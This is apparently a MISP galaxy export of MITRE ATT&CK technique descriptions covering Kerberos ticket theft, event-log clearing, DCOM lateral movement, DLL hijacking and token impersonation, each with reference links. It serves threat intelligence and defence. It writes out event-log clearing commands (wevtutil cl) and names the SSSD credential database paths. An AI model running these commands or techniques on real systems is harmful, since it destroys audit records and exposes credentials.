Linux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the "ccache". The credentials are stored in the ccache file while they remain valid and generally while a user’s session lasts.(Citation: MIT ccache) On modern Redhat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in <code>/var/lib/sss/secrets/secrets.ldb</code> as well as the corresponding key located in <code>/var/lib/sss/secrets/.secrets.mkey</code>. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). The ccache file may also be converted into a Windows format using tools such as Kekeo.(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo)

Kerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller’s environment to determine access. The storage location for these ccache entries is influenced by the <code>/etc/krb5.conf</code> configuration file and the <code>KRB5CCNAME</code> environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using <code>kinit</code>, <code>klist</code>, <code>ktutil</code>, and <code>kcc</code> built-in binaries or via Apple’s native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user’s TGT or Service Tickets.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: macOS kerberos framework MIT)

The tag is: misp-galaxy:mitre-attack-pattern="Steal or Forge Kerberos Tickets - T1558"

Table 3198. Table References
Links
https://attack.mitre.org/techniques/T1558
https://capec.mitre.org/data/definitions/652.html
https://adsecurity.org/?p=227
https://docs.microsoft.com/windows-server/administration/windows-commands/klist
https://web.mit.edu/kerberos/krb5-1.12/doc/basic/ccache_def.html
https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html
https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
https://github.com/gentilkiwi/kekeo
https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f
http://web.mit.edu/macdev/KfM/Common/Documentation/preferences.html
https://adsecurity.org/?p=1515
https://blog.stealthbits.com/detect-pass-the-ticket-attacks
https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
https://gallery.technet.microsoft.com/scriptcenter/Kerberos-Golden-Ticket-b4814285
https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
https://adsecurity.org/?p=2293
https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea

Aggregate individual’s digital footprint - T1275

In addition to a target’s social media presence may exist a larger digital footprint, such as accounts and credentials on e-commerce sites or usernames and logins for email. An adversary familiar with a target’s username can mine to determine the target’s larger digital footprint via publicly available sources. (Citation: DigitalFootprint) (Citation: trendmicro-vtech)

The tag is: misp-galaxy:mitre-attack-pattern="Aggregate individual’s digital footprint - T1275"

Table 3199. Table References
Links
https://attack.mitre.org/techniques/T1275

Domain Generation Algorithms (DGA) - T1323

This technique has been deprecated. Please use [Domain Generation Algorithms](https://attack.mitre.org/techniques/T1568/002).

The use of algorithms in malware to periodically generate a large number of domain names which function as rendezvous points for malware command and control servers. (Citation: DamballaDGA) (Citation: DambballaDGACyberCriminals)

The tag is: misp-galaxy:mitre-attack-pattern="Domain Generation Algorithms (DGA) - T1323"

Table 3200. Table References
Links
https://attack.mitre.org/techniques/T1323

Unconditional client-side exploitation/Injected Website/Driveby - T1372

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

A technique used to compromise victims wherein the victims visit a compromised website that redirects their browser to a malicious web site, such as an exploit kit’s landing page. The exploit kit landing page will probe the victim’s operating system, web browser, or other software to find an exploitable vulnerability to infect the victim. (Citation: GeorgeDriveBy) (Citation: BellDriveBy)

The tag is: misp-galaxy:mitre-attack-pattern="Unconditional client-side exploitation/Injected Website/Driveby - T1372"

Table 3201. Table References
Links
https://attack.mitre.org/techniques/T1372

LLMNR/NBT-NS Poisoning and Relay - T1171

The tag is: misp-galaxy:mitre-attack-pattern="LLMNR/NBT-NS Poisoning and Relay - T1171"

View relationships graph

LLMNR/NBT-NS Poisoning and Relay - T1171 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="LLMNR/NBT-NS Poisoning and SMB Relay - T1557.001" with estimative-language:likelihood-probability="almost-certain"

Table 3202. Table References
Links
https://attack.mitre.org/techniques/T1171
https://en.wikipedia.org/wiki/Link-Local_Multicast_Name_Resolution
https://technet.microsoft.com/library/cc958811.aspx
https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html
https://blog.secureideas.com/2018/04/ever-run-a-relay-why-smb-relays-should-be-on-your-mind.html
https://github.com/nomex/nbnspoof
https://www.rapid7.com/db/modules/auxiliary/spoof/llmnr/llmnr_response
https://github.com/SpiderLabs/Responder
https://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning
https://github.com/Kevin-Robertson/Conveigh

OS-vendor provided communication channels - T1390

Google and Apple provide Google Cloud Messaging and Apple Push Notification Service, respectively, services designed to enable efficient communication between third-party mobile app backend servers and the mobile apps running on individual devices. These services maintain an encrypted connection between every mobile device and Google or Apple that cannot easily be inspected and must be allowed to traverse networks as part of normal device operation. These services could be used by adversaries for communication to compromised mobile devices. (Citation: Securelist Mobile Malware 2013) (Citation: DroydSeuss)

The tag is: misp-galaxy:mitre-attack-pattern="OS-vendor provided communication channels - T1390"

Table 3203. Table References
Links
https://attack.mitre.org/techniques/T1390

Rogue Wi-Fi Access Points - T1465

An adversary could set up unauthorized Wi-Fi access points or compromise existing access points and, if the device connects to them, carry out network-based attacks such as eavesdropping on or modifying network communication(Citation: NIST-SP800153)(Citation: Kaspersky-DarkHotel).

The tag is: misp-galaxy:mitre-attack-pattern="Rogue Wi-Fi Access Points - T1465"

Table 3204. Table References
Links
https://attack.mitre.org/techniques/T1465
https://pages.nist.gov/mobile-threat-catalogue/lan-pan-threats/LPN-0.html
http://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-153.pdf
https://blog.kaspersky.com/darkhotel-apt/6613/

Clear Windows Event Logs - T1070.001

Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer’s alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit.

The event logs can be cleared with the following utility commands:

<code>wevtutil cl system</code>
<code>wevtutil cl application</code>
<code>wevtutil cl security</code>

These logs may also be cleared through other mechanisms, such as the event viewer GUI or [PowerShell](https://attack.mitre.org/techniques/T1059/001).

The tag is: misp-galaxy:mitre-attack-pattern="Clear Windows Event Logs - T1070.001"

Table 3205. Table References
Links
https://attack.mitre.org/techniques/T1070/001
https://docs.microsoft.com/windows-server/administration/windows-commands/wevtutil
https://msdn.microsoft.com/library/system.diagnostics.eventlog.clear.aspx
https://docs.microsoft.com/powershell/module/microsoft.powershell.management/clear-eventlog

Network Share Connection Removal - T1070.005

Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation. Windows shared drive and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) connections can be removed when no longer needed. [Net](https://attack.mitre.org/software/S0039) is an example utility that can be used to remove network share connections with the <code>net use \\system\share /delete</code> command. (Citation: Technet Net Use)

The tag is: misp-galaxy:mitre-attack-pattern="Network Share Connection Removal - T1070.005"

Table 3206. Table References
Links
https://attack.mitre.org/techniques/T1070/005
https://technet.microsoft.com/bb490717.aspx

Distributed Component Object Model - T1021.003

Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user.

The Windows Component Object Model (COM) is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE). Distributed COM (DCOM) is transparent middleware that extends the functionality of COM beyond a local computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)(Citation: Microsoft COM)

Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry.(Citation: Microsoft Process Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.(Citation: Microsoft COM ACL)

Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents(Citation: Enigma Excel DCOM Sept 2017) and may also invoke [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) (DDE) execution directly through a COM created instance of a Microsoft Office application(Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document. DCOM can be used as a method of remotely interacting with [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). (Citation: MSDN WMI)

The tag is: misp-galaxy:mitre-attack-pattern="Distributed Component Object Model - T1021.003"

Table 3207. Table References
Links
https://attack.mitre.org/techniques/T1021/003
https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
https://msdn.microsoft.com/library/windows/desktop/ms680573.aspx
https://msdn.microsoft.com/en-us/library/windows/desktop/ms687317(v=vs.85).aspx
https://docs.microsoft.com/en-us/windows/desktop/com/dcom-security-enhancements-in-windows-xp-service-pack-2-and-windows-server-2003-service-pack-1
https://enigma0x3.net/2017/11/16/lateral-movement-using-outlooks-createobject-method-and-dotnettojscript/
https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/
https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/
https://www.cybereason.com/blog/leveraging-excel-dde-for-lateral-movement-via-dcom
https://msdn.microsoft.com/en-us/library/aa394582.aspx

Network Device Configuration Dump - T1602.002

Adversaries may access network configuration files to collect sensitive data about the device and the network. The network configuration is a file containing parameters that determine the operation of the device. The device typically stores an in-memory copy of the configuration while operating, and a separate configuration on non-volatile storage to load after device reset. Adversaries can inspect the configuration files to reveal information about the target network and its layout, the network device and its software, or identifying legitimate accounts and credentials for later use.

Adversaries can use common management tools and protocols, such as Simple Network Management Protocol (SNMP) and Smart Install (SMI), to access network configuration files. (Citation: US-CERT TA18-106A Network Infrastructure Devices 2018) (Citation: Cisco Blog Legacy Device Attacks) These tools may be used to query specific data from a configuration repository or configure the device to export the configuration for later analysis.

The tag is: misp-galaxy:mitre-attack-pattern="Network Device Configuration Dump - T1602.002"

Table 3208. Table References
Links
https://attack.mitre.org/techniques/T1602/002
https://us-cert.cisa.gov/ncas/alerts/TA18-106A
https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
https://www.us-cert.gov/ncas/alerts/TA18-086A

Indicator Removal from Tools - T1027.005

Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target’s defensive systems or subsequent targets that may use similar systems.

A good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may modify the file to explicitly avoid that signature, and then re-use the malware.

The tag is: misp-galaxy:mitre-attack-pattern="Indicator Removal from Tools - T1027.005"

Table 3209. Table References
Links
https://attack.mitre.org/techniques/T1027/005

Exchange Email Delegate Permissions - T1098.002

Adversaries may grant additional permission levels, such as ReadPermission or FullAccess, to maintain persistent access to an adversary-controlled email account. The <code>Add-MailboxPermission</code> [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.(Citation: Microsoft - Add-MailboxPermission)(Citation: FireEye APT35 2018)(Citation: Crowdstrike Hiding in Plain Sight 2018)

Adversaries may also assign mailbox folder permissions through individual folder permissions or roles. Adversaries may assign the Default or Anonymous user permissions or roles to the Top of Information Store (root), Inbox, or other mailbox folders. By assigning one or both user permissions to a folder, the adversary can utilize any other account in the tenant to maintain persistence to the target user’s mail folders.(Citation: Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452)

This may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can assign more access rights to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules (ex: [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)), so the messages evade spam/phishing detection mechanisms.(Citation: Bienstock, D. - Defending O365 - 2019)

The tag is: misp-galaxy:mitre-attack-pattern="Exchange Email Delegate Permissions - T1098.002"

Table 3210. Table References
Links
https://attack.mitre.org/techniques/T1098/002
https://docs.microsoft.com/en-us/powershell/module/exchange/mailboxes/add-mailboxpermission?view=exchange-ps
https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf
https://www.crowdstrike.com/blog/hiding-in-plain-sight-using-the-office-365-activities-api-to-investigate-business-email-compromises/
https://www.fireeye.com/blog/threat-research/2021/01/remediation-and-hardening-strategies-for-microsoft-365-to-defend-against-unc2452.html
https://www.slideshare.net/DouglasBienstock/shmoocon-2019-becs-and-beyond-investigating-and-defending-office-365

Masquerade Task or Service - T1036.004

Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or benign. Tasks/services executed by the Task Scheduler or systemd will typically be given a name and/or description.(Citation: TechNet Schtasks)(Citation: Systemd Service Units) Windows services will have a service name as well as a display name. Many benign tasks and services exist that have commonly associated names. Adversaries may give tasks or services names that are similar or identical to those of legitimate ones.

Tasks or services contain other fields, such as a description, that adversaries may attempt to make appear legitimate.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Fysbis Dr Web Analysis)

The tag is: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004"

Table 3211. Table References
Links
https://attack.mitre.org/techniques/T1036/004
https://technet.microsoft.com/en-us/library/bb490996.aspx
https://www.freedesktop.org/software/systemd/man/systemd.service.html
http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/
https://vms.drweb.com/virus/?i=4276269

Archive via Custom Method - T1560.003

An adversary may compress or encrypt data that is collected prior to exfiltration using a custom method. Adversaries may choose to use custom archival methods, such as encryption with XOR or stream ciphers implemented with no external library or utility references. Custom implementations of well-known compression algorithms have also been used.(Citation: ESET Sednit Part 2)

The tag is: misp-galaxy:mitre-attack-pattern="Archive via Custom Method - T1560.003"

Table 3212. Table References
Links
https://attack.mitre.org/techniques/T1560/003
http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf

Extra Window Memory Injection - T1055.011

Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.

Before creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulate appearance and behavior (via windows procedures, which are functions that handle input/output of data).(Citation: Microsoft Window Classes) Registration of new windows classes can include a request for up to 40 bytes of EWM to be appended to the allocated memory of each instance of that class. This EWM is intended to store data specific to that window and has specific application programming interface (API) functions to set and get its value. (Citation: Microsoft GetWindowLong function) (Citation: Microsoft SetWindowLong function)

Although small, the EWM is large enough to store a 32-bit pointer and is often used to point to a windows procedure. Malware may possibly utilize this memory location in part of an attack chain that includes writing code to shared sections of the process’s memory, placing a pointer to the code in EWM, then invoking execution by returning execution control to the address in the process’s EWM.

Execution granted through EWM injection may allow access to both the target process’s memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as <code>WriteProcessMemory</code> and <code>CreateRemoteThread</code>.(Citation: Elastic Process Injection July 2017) More sophisticated malware samples may also potentially bypass protection mechanisms such as data execution prevention (DEP) by triggering a combination of windows procedures and other system functions that will rewrite the malicious payload inside an executable portion of the target process. (Citation: MalwareTech Power Loader Aug 2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)

Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via EWM injection may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: misp-galaxy:mitre-attack-pattern="Extra Window Memory Injection - T1055.011"

Table 3213. Table References
Links
https://attack.mitre.org/techniques/T1055/011
https://msdn.microsoft.com/library/windows/desktop/ms633574.aspx
https://msdn.microsoft.com/library/windows/desktop/ms633584.aspx
https://msdn.microsoft.com/library/windows/desktop/ms633591.aspx
https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
https://www.malwaretech.com/2013/08/powerloader-injection-something-truly.html
https://www.welivesecurity.com/2013/03/19/gapz-and-redyms-droppers-based-on-power-loader-code/
https://msdn.microsoft.com/library/windows/desktop/ms644953.aspx

Create Process with Token - T1134.002

Adversaries may create a new process with a different token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as <code>CreateProcessWithTokenW</code> and <code>runas</code>.(Citation: Microsoft RunAs)

Creating processes with a different token may require the credentials of the target user, specific privileges to impersonate that user, or access to the token to be used (ex: gathered via other means such as [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) or [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003)).

The tag is: misp-galaxy:mitre-attack-pattern="Create Process with Token - T1134.002"

Table 3214. Table References
Links
https://attack.mitre.org/techniques/T1134/002
https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771525(v=ws.11)
https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing

Disable or Modify Tools - T1562.001

Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take the many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information.

Adversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls)

The tag is: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001"

Table 3215. Table References
Links
https://attack.mitre.org/techniques/T1562/001
https://capec.mitre.org/data/definitions/578.html
https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/
https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/

Compromise Software Supply Chain - T1195.002

Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version.

Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.(Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011)

The tag is: misp-galaxy:mitre-attack-pattern="Compromise Software Supply Chain - T1195.002"

Table 3216. Table References
Links
https://attack.mitre.org/techniques/T1195/002
https://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacities
https://www.commandfive.com/papers/C5_APT_SKHack.pdf

Make and Impersonate Token - T1134.003

Adversaries may make and impersonate tokens to escalate privileges and bypass access controls. If an adversary has a username and password but the user is not logged onto the system, the adversary can then create a logon session for the user using the <code>LogonUser</code> function. The function will return a copy of the new session’s access token and the adversary can use <code>SetThreadToken</code> to assign the token to a thread.

The tag is: misp-galaxy:mitre-attack-pattern="Make and Impersonate Token - T1134.003"

Table 3217. Table References
Links
https://attack.mitre.org/techniques/T1134/003
https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing

Compromise Hardware Supply Chain - T1195.003

Adversaries may manipulate hardware components in products prior to receipt by a final consumer for the purpose of data or system compromise. By modifying hardware or firmware in the supply chain, adversaries can insert a backdoor into consumer networks that may be difficult to detect and give the adversary a high degree of control over the system. Hardware backdoors may be inserted into various devices, such as servers, workstations, network infrastructure, or peripherals.

The tag is: misp-galaxy:mitre-attack-pattern="Compromise Hardware Supply Chain - T1195.003"

Table 3218. Table References
Links
https://attack.mitre.org/techniques/T1195/003

Change Default File Association - T1546.001

Adversaries may establish persistence by executing malicious content triggered by a file type association. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access (Citation: Microsoft Change Default Programs) (Citation: Microsoft File Handlers) or by administrators using the built-in assoc utility. (Citation: Microsoft Assoc Oct 2017) Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.

System file associations are listed under <code>HKEY_CLASSES_ROOT\.[extension]</code>, for example <code>HKEY_CLASSES_ROOT\.txt</code>. The entries point to a handler for that extension located at <code>HKEY_CLASSES_ROOT\[handler]</code>. The various commands are then listed as subkeys underneath the shell key at <code>HKEY_CLASSES_ROOT\[handler]\shell\[action]\command</code>. For example: * <code>HKEY_CLASSES_ROOT\txtfile\shell\open\command</code> * <code>HKEY_CLASSES_ROOT\txtfile\shell\print\command</code> * <code>HKEY_CLASSES_ROOT\txtfile\shell\printto\command</code>

The values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to continually execute arbitrary commands. (Citation: TrendMicro TROJ-FAKEAV OCT 2012)

The tag is: misp-galaxy:mitre-attack-pattern="Change Default File Association - T1546.001"

Table 3219. Table References
Links
https://attack.mitre.org/techniques/T1546/001
https://capec.mitre.org/data/definitions/556.html
https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs
http://msdn.microsoft.com/en-us/library/bb166549.aspx
https://docs.microsoft.com/windows-server/administration/windows-commands/assoc
https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd

Hidden Files and Directories - T1564.001

Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (<code>dir /a</code> for Windows and <code>ls –a</code> for Linux and macOS).

On Linux and Mac, users can mark specific files as hidden simply by putting a “.” as the first character in the file or folder name (Citation: Sofacy Komplex Trojan) (Citation: Antiquated Mac Malware). Files and folders that start with a period, ‘.’, are by default hidden from being viewed in the Finder application and standard command-line utilities like “ls”. Users must specifically change settings to have these files viewable.

Files on macOS can also be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: WireLurker). On Windows, users can mark specific files as hidden by using the attrib.exe binary. Many applications create these hidden files and folders to store information so that it doesn’t clutter up the user’s workspace. For example, SSH utilities create a .ssh folder that’s hidden and contains the user’s known hosts and keys.

Adversaries can use this to their advantage to hide files and folders anywhere on the system and evading a typical user or system analysis that does not incorporate investigation of hidden files.

The tag is: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001"

Table 3220. Table References
Links
https://attack.mitre.org/techniques/T1564/001
https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/
https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf

DLL Search Order Hijacking - T1574.001

Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.

There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)

Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)

If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.

The tag is: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001"

Table 3221. Table References
Links
https://attack.mitre.org/techniques/T1574/001
https://capec.mitre.org/data/definitions/471.html
https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order?redirectedfrom=MSDN
https://www.fireeye.com/blog/threat-research/2010/07/malware-persistence-windows-registry.html
https://www.owasp.org/index.php/Binary_planting
https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
https://docs.microsoft.com/en-us/security-updates/securityadvisories/2010/2269637
https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-redirection?redirectedfrom=MSDN
https://msdn.microsoft.com/en-US/library/aa375365
https://www.fireeye.com/blog/threat-research/2010/08/dll-search-order-hijacking-revisited.html

Services File Permissions Weakness - T1574.010

Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.

Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.

The tag is: misp-galaxy:mitre-attack-pattern="Services File Permissions Weakness - T1574.010"

Table 3222. Table References
Links
https://attack.mitre.org/techniques/T1574/010
https://capec.mitre.org/data/definitions/17.html

Exfiltration to Code Repository - T1567.001

Adversaries may exfiltrate data to a code repository rather than over their primary command and control channel. Code repositories are often accessible via an API (ex: https://api.github.com). Access to these APIs are often over HTTPS, which gives the adversary an additional level of protection.

Exfiltration to a code repository can also provide a significant amount of cover to the adversary if it is a popular service already used by hosts within the network.

The tag is: misp-galaxy:mitre-attack-pattern="Exfiltration to Code Repository - T1567.001"

Table 3223. Table References
Links
https://attack.mitre.org/techniques/T1567/001

Network Address Translation Traversal - T1599.001

Adversaries may bridge network boundaries by modifying a network device’s Network Address Translation (NAT) configuration. Malicious modifications to NAT may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.

Network devices such as routers and firewalls that connect multiple networks together may implement NAT during the process of passing packets between networks. When performing NAT, the network device will rewrite the source and/or destination addresses of the IP address header. Some network designs require NAT for the packets to cross the border device. A typical example of this is environments where internal networks make use of non-Internet routable addresses.(Citation: RFC1918)

When an adversary gains control of a network boundary device, they can either leverage existing NAT configurations to send traffic between two separated networks, or they can implement NAT configurations of their own design. In the case of network designs that require NAT to function, this enables the adversary to overcome inherent routing limitations that would normally prevent them from accessing protected systems behind the border device. In the case of network designs that do not require NAT, address translation can be used by adversaries to obscure their activities, as changing the addresses of packets that traverse a network boundary device can make monitoring data transmissions more challenging for defenders.

Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to change the operating system of a network device, implementing their own custom NAT mechanisms to further obscure their activities

The tag is: misp-galaxy:mitre-attack-pattern="Network Address Translation Traversal - T1599.001"

Table 3224. Table References
Links
https://attack.mitre.org/techniques/T1599/001
https://tools.ietf.org/html/rfc1918

Disable Windows Event Logging - T1562.002

Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits. Windows event logs record user and system activity such as login attempts, process creation, and much more.(Citation: Windows Log Events) This data is used by security tools and analysts to generate detections.

The EventLog service maintains event logs from various system components and applications.(Citation: EventLog_Core_Technologies) By default, the service automatically starts when a system powers on. An audit policy, maintained by the Local Security Policy (secpol.msc), defines which system events the EventLog service logs. Security audit policy settings can be changed by running secpol.msc, then navigating to <code>Security Settings\Local Policies\Audit Policy</code> for basic audit policy settings or <code>Security Settings\Advanced Audit Policy Configuration</code> for advanced audit policy settings.(Citation: Audit_Policy_Microsoft)(Citation: Advanced_sec_audit_policy_settings) <code>auditpol.exe</code> may also be used to set audit policies.(Citation: auditpol)

